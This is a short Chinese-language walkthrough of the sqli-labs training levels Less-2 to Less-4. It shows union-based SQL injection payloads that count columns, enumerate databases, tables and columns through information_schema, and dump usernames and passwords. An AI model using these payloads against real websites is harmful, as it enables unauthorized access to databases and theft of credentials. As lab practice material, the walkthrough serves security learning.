一、Less-2
- 与Less-1相同,我们同样使用
?id=1'
看是否可以注入, 发现不可以,并且提示错误,我们可以知道,这里不需要引号,这就是与Less-1不同的地方,除此之外,以下步骤与Less-1相同
2.接下来我们使用 order by 查看有多少列
仍然有三列
? id=1 order by 3--+
3.使用联合查询 union select 看有哪些数据可以回显
?id=1 union select 1,2,3–+
4.接下来查询所有数据库
?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata–+5.继续查询表
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479–+6.再查询列
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273–+7.最后取出所有数据
?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users–+
二、Less-3
1.通过进行测试,我们可以发现Less-3与前面不同的是多了一个括号
2.其下步骤与1,2相同
最后取出数据
?id=-1’) union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users–+
三、Less-4
1.继续通过测试,我们会发现Less-4也是一样的操作,根据提示,发现不一样的是Less-4是双引号+括号
2.其他的都是相同的
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)